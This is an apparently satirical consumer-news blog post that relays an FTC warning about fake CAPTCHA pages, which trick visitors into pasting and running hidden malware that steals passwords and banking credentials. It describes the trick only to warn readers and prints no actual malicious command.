realstupidshit.com

America's dumbest corner of the internet

Search | Submit a tip
The CAPTCHA That Isn't

The FTC warned about fake CAPTCHA requests that look legit but actually install malware on your computer, because apparently security theater needed method acting

The Federal Trade Commission is reporting phishing scams that mimic CAPTCHA verification screens and trick people into running hidden commands that download malware to steal passwords and banking credentials.

June 14, 2026 • Real Stupid Shit Desk

What Happened

The FTC is getting reports about a new phishing scam that looks almost identical to the CAPTCHA requests people see all the time online. Real CAPTCHAs give you image or text-based tasks—type letters and numbers, match pictures of fire hydrants, that kind of thing. But the fake CAPTCHA scams are different. They tell you to run keyboard commands on your computer, like "Windows + R," then "Ctrl + V," then "Enter."

Once you run those commands, you've just pasted and executed hidden malware that scammers left for you. And now they have access to your email login data, mobile banking credentials, saved passwords, cryptocurrency wallets, and anything else they can grab from your browser before you notice something's wrong.

Why This Matters

CAPTCHAs exist to prove you're human. Most people have learned not to trust unexpected pop-ups. But a CAPTCHA screen? That looks official. That looks like normal internet. And when the scammer's message says "security verification," it doesn't feel like a trap—it feels like routine web maintenance.

The genius of the scam is that it exploits muscle memory. You're used to clicking through CAPTCHAs without really thinking about it. So a CAPTCHA that asks for a tiny bit more interaction—just type a few commands—doesn't trigger the alarm in your brain that it should.

The Dumb Part With The Fake Proof

The dumb part is that legitimate websites and services have spent decades teaching people that CAPTCHAs are safe, boring security checks that prove you're human. That trust is now a vulnerability. Real CAPTCHAs never ask you to run commands on your device. Ever. But because people have been trained not to question them, a scammer can just copy the aesthetic and add one dangerous step.

If a CAPTCHA asks you to paste a command or run software, that's not a CAPTCHA. That's a command injection attack wearing a CAPTCHA costume.

How to Protect Yourself

The FTC says to remember: real CAPTCHAs never ask you to run commands on your computer. If you see a CAPTCHA that does, or if you notice something downloading after you respond to one, act quickly:

The Bottom Line

The real stupid shit is that we've created a world where the most common, trusted-looking security check on the internet is now a viable vector for malware delivery. When a CAPTCHA that looks like a CAPTCHA can steal your banking credentials, we have a fundamental trust problem. The scammer wins because they borrowed an existing expectation. The internet loses because another everyday thing is now something to be paranoid about.

Sources

FTC Consumer Alert: How to spot a CAPTCHA scam

FTC: Malware — How to Protect Against, Detect, and Remove It

FTC: Report Fraud

← Back to Scam Watch